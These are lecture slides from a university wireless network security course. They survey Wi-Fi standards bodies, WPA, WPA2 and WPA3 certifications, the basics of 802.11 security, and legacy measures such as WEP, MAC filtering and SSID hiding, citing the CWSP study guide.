COMP 555 - Wireless Network Security

Lecture 3

1
Chapter 1: WLAN
Security Overview
Chapter 2: Legacy
802.11 Security

2
Lecture Objectives
• Introduce the new WPA3 security for Wi-Fi 6
• Review Standards Organizations that influence wireless
network security, specifically the Wi-Fi Alliance
• Explain IEEE 802.11 network security basics, such as:
• Data privacy
• Authentication, authorization, and accounting (AAA)
• Segmentation
• Monitoring
• Policy

• Describe IEEE 802.11 security history:

• 802.11i security amendment and WPA Certifications
• Robust Security Network (RSN)
• Robust Security Network Association (RSNA)

(Coleman, Westcott, & Harkins, 2016a, 2016b)

3
Lecture Objectives (Cont.)
• Explain Legacy 802.11 Security, such as:
• Wired Equivalent Privacy (WEP)
• Open System authentication
• Shared Key authentication
• Virtual Private Networks (VPNs)
• MAC Filters
• Service Set Identifier (SSID) Segmentation
• SSID Cloaking/Hiding

(Coleman et al., 2016a, 2016b)

4
Standards Organizations
Table 1: Standards organizations that influence wireless network security
Organization
Wi-Fi Alliance
International Organization for
Standardization (ISO)
Institute of Electrical and Electronics
Engineers (IEEE)
Internet Society (ISOC) – composed of the
following five main groups:
• Internet Engineering Task Force (IETF)
• Internet Architecture Board (IAB)
• Internet Corporation for Assigned
Names and Numbers (ICANN)
• Internet Engineering Steering Group
(IESG)
• Internet Research Task Force (IRTF)
(Coleman et al., 2016b)
Purpose
Provides interoperability testing and certification (e.g., WPA
,WPA2, and WPA3).
Develops standards to meet organizational needs (e.g.,
The OSI model).
Creates and revises standards to satisfy organizational
requirements (e.g., IEEE 802.11).
Promotes the open development, evolution, and use of the
Internet for the benefit of all people throughout the world.
• Produces technical documents known as RFCs
(Request for Comments) that influence the way people
design, use, and manage the Internet.
• Oversees the technical evolution of the Internet and
supervises the IETF.
• Allocates IP addresses and manages Domain Name
System and root server system for the Internet.
• Provides technical management of IETF’s activities and
the Internet standards process.
• Promotes research of importance to the evolution of the
Internet.
5
Standards Organizations (Cont.)
• Wi-Fi Alliance
• Provides interoperability testing and certification.
• Wi-Fi is a registered trademark, originally registered
in 1999 by Wireless Ethernet Compatibility Alliance
(WECA) and now registered to the Wi-Fi Alliance.

Figure 1: Wi-Fi Certified logo for devices that have

met the Wi-Fi Alliance’s interoperability testing criteria
(Coleman et al., 2016b, p. 7)

6
Wi-Fi Alliance Interoperability Certifications
• Core Technology and Security
• Certifies 802.11a, b, g, n, and/or ac interoperability to ensure
wireless data transmission works as expected (see Table 2).
• Tests wireless devices for compliance with IEEE 802.11i security
requirements, such as support for Wi-Fi Protected Access (WPA)
and Wi-Fi Protected Access 2 (WPA2) in personal and enterprise
environments.
Table 2: Five generations of Wi-Fi
Wi-Fi technology Frequency band Maximum data rate
802.11a 5 GHz 54 Mbps
802.11b 2.4 GHz 11 Mbps
802.11g 2.4 GHz 54 Mbps
802.11n 2.4 GHz, 5 GHz 600 Mbps
2.4 or 5 GHz (selectable),
or 2.4 and 5 GHz (concurrent)
802.11ac 5 GHz 6.93 Gbps
(Coleman et al., 2016b, p. 9)
7
 Security in Wireless

Authentication
Proving identity can be done using:
- Something you know
- Something you have
- Something you are
Encryption
- Symmetric (same keys)
- Asymmetric (different keys)

8
 Wireless Security Evolution

MAC Address 802.1x

WEP WPA/WPA2 WPA3
Authentication Dynamic WEP

9
Wi-Fi Alliance Interoperability Certifications

• Wi-Fi Protected Access (WPA)

• Certification introduced before the release of 802.11i
amendment to 802.11 standard
• Supports two modes:
• Personal and Enterprise
• Authentication methods:
• Personal mode uses passphrase or pre-shared key
• Enterprise mode uses 802.1X/EAP

• Encryption Mechanism / Cipher:

• TKIP / RC4

(Coleman et al., 2016b)

10
Wi-Fi Alliance Interoperability Certifications

• Wi-Fi Protected Access 2 (WPA2)

• Certification introduced after the release of 802.11i
amendment to 802.11 standard
• Supports two modes:
• Personal and Enterprise
• Authentication methods:
• Personal mode uses passphrase or pre-shared key
• Enterprise mode uses 802.1X/EAP

• Encryption Mechanism / Cipher:

• CCMP / AES and allows TKIP / RC4

(Coleman et al., 2016b)

11
Wi-Fi Alliance Interoperability Certifications (Cont.)
Table 3: Details of the WPA and WPA2 certifications

Wi-Fi Alliance Security Authentication Encryption Mechanism /

Mechanism Mechanism Cipher
WPA-Personal Passphrase or Pre-Shared TKIP/RC4
Key (PSK)
WPA-Enterprise 802.1X/EAP TKIP/RC4

WPA2-Personal Passphrase or Pre-Shared CCMP/AES or TKIP/RC4

Key (PSK)
WPA2-Enterprise 802.1X/EAP CCMP/AES or TKIP/RC4

Acronyms:
TKIP = Temporal Key Integrity Protocol
RC4 = Rivest Cipher 4 (named after Ron Rivest of RSA Security)
CCMP = Counter Mode with Cipher-Block Chaining Message
Authentication Code Protocol
AES = Advanced Encryption Standard
EAP = Extensible Authentication Protocol

12
(Bartz, 2017, p. 57)
Wi-Fi Alliance Interoperability Certifications (Cont.)
• Wi-Fi Multimedia (WMM)
• Based on quality of service (QoS) mechanisms defined in the
802.11e amendment to 802.11 standard.
• Prioritizes transmission of time-sensitive applications like
voice or video on the half-duplex RF medium.
• Both the access point and wireless client must support WMM
interoperability certification.

• Wi-Fi Multimedia Power Save (WMM-PS)

• Helps conserve battery power for devices using Wi-Fi radios
by managing the time they spend in sleep mode.
• Critical for handheld and mobile devices like voice over Wi-Fi
(VoWiFi) phones, tablets, and notebook computers.
• Both the access point and wireless client must support WMM-PS
interoperability certification.
(Coleman et al., 2016b)
13
Wi-Fi Alliance Interoperability Certifications (Cont.)

• Wi-Fi Protected Setup (WPS)

• Provides simplified and automatic WPA and WPA2
security configurations for home and small business
owners.
• Possible configurations:
• Push-button configuration (PBC)
• PIN-based configuration
• Near Field Communication (NFC)

• Support for PIN-based configuration is mandatory in

all Wi-Fi Protected Setup devices.
• Support for PBC and NFC configurations is optional.

(Coleman et al., 2016b)

14
Wi-Fi Alliance Interoperability Certifications (Cont.)

• Security Hole with WPS

• WPS security flaw was reported in December 2011.
• Intruder can hack PIN used to create the 256-bit
pre-shared key and gain access to the wireless
network.
• Possible solutions:
• Disable WPS feature
• Update firmware on wireless router
• Manually configure WPA2 security standard
• Upgrade to a newer router with better security settings

(Bartz, 2017)
15
802.11 Security Basics

Five major components are typically required to

secure an 802.11 wireless network:
• Data privacy
• Authentication, Authorization, and Accounting (AAA)
• Segmentation
• Monitoring
• Policy

(Coleman et al., 2016b)

16
802.11 Security Basics (Cont.)
Data Privacy
• 802.11 wireless networks transmit data feely and openly in the air.
• Strong encryption is needed to ensure data is sent securely and
decrypted and processed by the intended recipient.

Authentication, Authorization, and Accounting (AAA)

• Common security concept that defines the protection of network
resources.
• Authentication: Verifies user identity and credentials (e.g., via
usernames and passwords).
• Authorization: Determines the type of access a user or device has
to network resources based on file system rights and permissions.
• Accounting: Tracks the use of network resources by users and
devices through logging.

(Coleman et al., 2016b)

17
802.11 Security Basics (Cont.)
Segmentation
• Separates user traffic within a WLAN using techniques such as:
• Firewalls
• Routers
• Virtual private networks (VPNs)
• Virtual local area networks (VLANs)
• Encapsulation or tunnelling techniques (e.g., generic routing
encapsulation (GRE))
• Most common 802.11 enterprise WLAN segmentation strategy is VLANs.

Monitoring
• Use of hardware and software products to review the performance
and security of the wireless network.
• Logs, wireless intrusion detection systems (WIDSs), and wireless
intrusion prevention systems (WIPSs) should be used for monitoring.
(Coleman et al., 2016b)
18
802.11 Security Basics (Cont.)
Policy
• Documents that clearly outline the proper use and configuration of
wireless networks, and the consequences for not following mandated
procedures.
• Some policies applicable to wireless networks include:
• IT Acceptable Use Policy – defines purpose and use of WLAN
• Wireless Use Policy – provides specific details on how devices should
be used on WLAN
• Password Policy – outlines criteria, use, and protection of passwords
• Data Sensitivity Policy – defines what is considered sensitive data and
how it should be protected
• Physical Security Policy – explains how WLAN infrastructure will be
protected from theft and vandalism
• Remote Office Policy – describes the procedures remote users must
follow to protect the data of the organization

(Coleman et al., 2016b)

19
802.11 Security History
Original IEEE 802.11 Standard (1997-2004):
• Not much was defined in terms of security.
• Two key components of any wireless security solution are data
privacy (encryption) and authentication (identity verification).
• Wired Equivalent Privacy (WEP) was the only defined method of
encryption in an 802.11 network.
• WEP has been cracked and is not considered an acceptable
means of providing data privacy.
• Two methods of authentication were defined:
• Open System authentication
• Shared Key authentication

(Coleman et al., 2016b)

20
802.11 Security History (Cont.)
802.11i Security Amendment
• Ratified and published in 2004 as IEEE Standard 802.11i-2004.
• Defined stronger encryption and better authentication methods.
• Defined a robust security network (RSN) as follows:
• Uses Counter Mode with Cipher‐Block Chaining Message Authentication
Code Protocol (CCMP) and the Advanced Encryption Standard (AES)
algorithm for enhanced data privacy.
• Uses either IEEE 802.1X authorization framework with an Extensible
Authentication Protocol (EAP), or pre-shared keys (PSKs) for enhanced
authentication.

• Defined a robust security network association (RSNA) as follows:

• Where two wireless devices or stations establish a procedure to
authenticate and associate with each other as well as create dynamic
encryption keys through a process known as the 4-Way Handshake.
(Coleman et al., 2016b)
21
802.11 Security History (Cont.)
WPA Certifications Created by Wi-Fi Alliance
• Wi-Fi Protected Access (WPA)
• Created prior to the IEEE ratification of the 802.11i amendment.
• Considered a preview of 802.11i amendment.
• Supports only TKIP/ARC4 dynamic encryption-key generation methods.
• 802.1X/EAP authentication is required in the enterprise, and
passphrase or pre-shared key authentication in a SOHO environment.

• Wi-Fi Protected Access 2 (WPA2)

• Created after the IEEE ratification of the 802.11i amendment.
• Considered more of a mirror of 802.11i security amendment.
• Supports both CCMP/AES and TKIP/ARC4 dynamic encryption-key
generation methods.
• 802.1X/EAP authentication is required in the enterprise and passphrase
or pre-shared key authentication in a SOHO environment.
• AES cipher used by CCMP is processor-intensive.
• Some older legacy devices that support WEP and TKIP need to be
upgraded since hardware does not support CCMP.
(Coleman et al., 2016b) 22
 WPA3
• There are two types: WPA3-Personal (uses passwords) and
WPA3-Enterprise (uses security systems )
• Prevent the use of old technology
• WPA3 not compatible with WEP or TKIP (WPAv1)
• WPA3 utilizes EAP methods with stronger ciphers
• Add new technology with improved security
• WPA-PSK Replaced with SAE (Simultaneous Authentication of
Equals)
• Add 192-bit mode (Suite B) for high-grade encryption (optional) only
for Enterprise mode.
• Utilize consistent cryptographic algorithms/hashing across all
aspects of encryption/key generation/authentication
• Protected Management Frame (PMF) is enabled by default:
– Prevent ”Spoofed Disconnect” Attacks
– Works for WPA2, and WPA3
23
 WPA3-Personal
• Disallows WEP & TKIP protocols
• Requires the use of Protected Management Frames
• Replaces PSK with SAE (Simultaneous Authentication of Equals)
– Elliptic curve cryptography
– Password is never shared during the key exchange protocol
– Resistant to dictionary attacks
❑ Master key no longer based on Passphrase
❑ Only one guess per network access attempt
• It has a “Transition Mode” which allows:
– (WPA2-PSK & WPA3-SAE)

24
 WPA3-Enterprise
• Features:
– It is the same as WPA2-Enterprise in addition to Protected
Management Frames (PMF) enabled (mandatory).
– 192-bit mode for EAP-TLS (Suite B):
• It enforces EAP-TLS, 256 bit encryption and SHA384
• RSA keys > 3K or elliptic curve P-384
❑ TLS v1.2
❑ EAP server enforces policy via RADIUS attributes
❑ 4-Way Handshake uses SHA384 with 192-bit AKM

• Drawback:
– No real update to WPA2
– 192-bit mode requires RADIUS and clients with EAP-TLS 192-bit
support
25
Table 4: IEEE 802.11 security standards and certifications
802.11 Wi-Fi Alliance Authentication Encryption Cipher Key
standard certification method method generation
802.11 legacy No Open System or WEP ARC4 Static
Certification Shared Key

WPA-Personal WPA Passphrase TKIP ARC4 Dynamic

(also known as WPA
PSK and WPA Pre-
Shared Key)

WPA- 802.1X/EAP TKIP ARC4 Dynamic

Enterprise
802.11-2012 WPA2- WPA2 Passphrase CCMP AES Dynamic
Personal (also known as WPA2 (mandatory) (mandatory)
PSK and WPA2 Pre-
Shared Key) TKIP ARC4 Dynamic
(optional) (optional)

802.11-2012 WPA2- 802.1X/EAP CCMP AES Dynamic

Enterprise (mandatory) (mandatory)

TKIP ARC4 Dynamic

(optional) (optional)

(Coleman et al., 2016b, p. 20)

WEP, Open System Authentication, and Shared Key Authentication are considered
legacy security mechanisms and should not be part of any new network plan. 26
Open System Authentication
• Only pre-RSNA security mechanism that has not been deprecated
(discouraged from being used).
• Provides authentication without performing any type of client verification.
• Considered a null authentication because there is no exchange or
verification of identity between the devices.
• Every station (STA) is validated during Open System authentication.
• Open System authentication is used in a basic service set (BSS) and an
independent BSS (IBSS).
• Basic Service Set (BSS) is the collection of wireless devices that make up
a WLAN.
• Independent BSS (IBSS) is made up of wireless client stations only (no
access points) and operates in Ad Hoc Mode.
• Works in two different modes:
• Ad Hoc Mode: Wireless devices communicate without an access point.
Also known as peer-to-peer mode.
• Infrastructure Mode: Wireless devices communicate via an access point.
(Coleman et al., 2016a) 27
Open System Authentication (Cont.)
Process:
1. The client station (STA) makes an authentication request to the access point.
2. The access point authenticates the client STA without verifying its identity.
3. The client STA requests to associate or register with the access point based on
its 802.11 capabilities (e.g., encryption type and supported data rates).
4. The access point associates with the client STA by assigning it an Association
ID (AID) so that data can be transmitted and received between the devices.
5. The client STA establishes a Layer 2 connection to the access point and joins
the basic service set (BSS).
(Cisco, n.d.; Coleman et al., 2016a)

Figure 2: Open System authentication

(Coleman et al., 2016a, p. 32) 28
Open System Authentication (Cont.)
• WEP encryption is optional with Open System authentication.
• WEP is used to only encrypt the MAC Service Data Unit (MSDU),
which contains the Layers 3 to 7 payload of 802.11 data frames,
after the client station is authenticated and associated.
• WEP, therefore, is not part of the Open System authentication
process, but a way to provide data privacy after authentication and
association occur.
• Question: Why is Open System authentication still used when it
does not verify the identity of client devices?
• Answer: Open System authentication does not need to be secure,
because it can be implemented with more advanced security
authentication methods, such as 802.1X/EAP (see Figure 3).

(Coleman et al., 2016a)

29
Open System Authentication (Cont.)

RADIUS server
communicates with a
central server to
authenticate users/devices
and authorize them to
access network resources.

Figure 3: Open System and 802.1X/EAP authentication

(Coleman et al., 2016a, p. 32)

• Open System authentication and association between the client STA

and the AP still occur prior to the 802.1X/EAP authentication exchange
between the client STA and the RADIUS server.
• Open System and 802.1X/EAP authentication can be used to
accommodate bring your own device (BYOD) and guest access.
(Coleman et al., 2016a)
30
Shared Key Authentication
• Uses Wired Equivalent Privacy (WEP) to authenticate client stations.
• Requires that a static WEP key be configured on both the client STA and the
access point (AP).
• Authentication will not work if the static WEP keys do not match.
• Similar to Open System authentication but includes a challenge and response
between the AP and the client station within the BSS.
• Shared Key authentication process is outlined in Figure 4 below.
• Shared WEP key is used to
encrypt and decrypt the
cleartext challenge.
• If authentication is successful,
the same static WEP key will
be used to encrypt and decrypt
802.11 data frames.
• Shared Key authentication can
also be used between two
STAs in an IBSS.
• Deprecated since it uses WEP.
Figure 4: Shared Key authentication
(Coleman et al., 2016a, p. 33)
31
Virtual Private Networks (VPNs)
• A virtual private network (VPN) is a technology that creates a safe
and encrypted connection or tunnel over a less secure network,
such as the Internet.
• Developed as a way to allow remote users and branch offices to
securely access corporate data, applications, and other resources.

Major VPN Protocols:

• Point-to-Point
Tunneling Protocol
(PPTP)
• Layer 2 Tunneling
Protocol (L2TP)
• Internet Protocol
Security (IPsec)
• Secure Sockets
Layer (SSL)

Figure 5: VPN and WLAN client access security

(Coleman et al., 2016a, p. 46) 33
VPNs and IEEE 802.11 WLANs
Why VPNs are not a recommended enterprise security solution for 802.11 WLANs:
• VPN Configuration Complexity
• Many components have to be installed and configured.
• An IP address is needed before a VPN connection can be established.
• A potential attacker can get both a Layer 2 and Layer 3 connection to an
access point before the VPN connection is established.
• Since most VPNs operate at Layer 3 of the OSI model, static routes often
need to be configured, which requires advanced routing skills.

• VPN Scalability
• As the size of the network grows, VPN servers will need to be expanded and
upgraded, which can be costly.
• VPN client software may need to be added to each computer connecting to
the WLAN, which can be a time-consuming process.

• WPA2 methods like CCMP/AES encryption and 802.1X/EAP authentication using

a RADIUS (Remote Authentication Dial-In User Service) server provide simpler
and cheaper enterprise solutions for secure WLAN client access.
(Coleman et al., 2016a) 34
MAC Filters
• Allow or deny access based upon physical or media
access control (MAC) address of device.
• Weak security measure due to exposure of MAC address
in 802.11 transmissions.
• Still used in SOHO deployments since it is a quick and
simple way to control access to network resources.
• Often implemented on legacy wireless access points
since they do not support stronger security.
• Usually a big waste of time because of the visibility of
addressing when using a protocol analyzer.
• Local list contains 500 addresses, can be extended to
2000
35
(Coleman et al., 2016a)
SSID (Service Set Identifier) Segmentation
VLAN and SSID segmentation is another technique to provide security in
a WLAN environment using enterprise-class autonomous access points.
• AP is configured for VLAN tagging using
802.1Q protocol.
• AP is connected to a Layer 2 or 3 switch.
• Different users are segmented by a
different SSID/VLAN pair.
• Each SSID is configured with different
security settings.
• However, this security strategy is not
recommended because too many SSIDs
configured on an AP can cause
excessive MAC layer overhead, which
adversely affects the throughput and
performance of the WLAN.

Figure 6: SSID/VLAN/Subnet mapping • No more than 4 SSIDs should be

(Coleman et al., 2016a, p. 51) configured per radio frequency on the AP.

36
SSID Cloaking/Hiding
• Stops unauthorized users from seeing the network.
• AP(s) still respond to probes for given SSIDs so that
legitimate end users can connect to the WLAN.
• Not a recommended enterprise security solution for
802.11 WLANs for the following reasons:
• A protocol analyzer, such as Wireshark, can capture frames
transmitted by legitimate users and discover the SSID, which
is transmitted in cleartext.
• Some hardware devices may not support connecting to hidden
or cloaked SSIDs.
• Assisting end users with manually entering or troubleshooting
SSIDs often consumes a lot of valuable technical support time.

(Coleman et al., 2016a)

37
Summary
• Standards organizations exist to improve wireless
network security.
• IEEE 802.11 security has matured to include more
robust authentication and encryption methods, such
as those used with WPA2:
• Supports both CCMP/AES and TKIP/ARC4 dynamic
encryption-key generation methods.
• 802.1X/EAP authentication is required in the enterprise and
passphrase or pre-shared key authentication in a SOHO
environment.
• Knowing the history of IEEE 802.11 security helps us
better understand and improve upon current WLAN
security issues.
(Coleman et al., 2016a, 2016b)
38
Summary (Cont.)
• Legacy security methods like WEP, Open System
Authentication, and Shared Key Authentication
should not be part of any new network plan.

• VPNs, MAC Filters, SSID Segmentation, and SSID

Cloaking/Hiding should not be used as enterprise
security solutions for 802.11 WLANs.
• WPA2 methods such as CCMP/AES encryption and
802.1X/EAP authentication using a RADIUS server should
be considered instead.

(Coleman et al., 2016a, 2016b)

39
References
Bartz, R. (2017). Wireless Local Area Networking, Standards, and
Certifications. In CWTS, CWS, and CWT Complete Study Guide,
pp. 35-76. Indianapolis, IN: Wiley.

Cisco. (n.d.). 802.11 Association process explained. Retrieved from

https://documentation.meraki.com/MR/WiFi_Basics_and_Best_
Practices/802.11_Association_process_explained

Coleman, D. D., Westcott, D. A., & Harkins, B. (2016a). Legacy 802.11

Security. In CWSP: Certified Wireless Security Professional
Study Guide (2nd ed., pp. 29-60). Indianapolis, IN: Wiley.

Coleman, D. D., Westcott, D. A., & Harkins, B. (2016b). WLAN Security

Overview. In CWSP: Certified Wireless Security Professional
Study Guide (2nd ed., pp. 1-28). Indianapolis, IN: Wiley.

40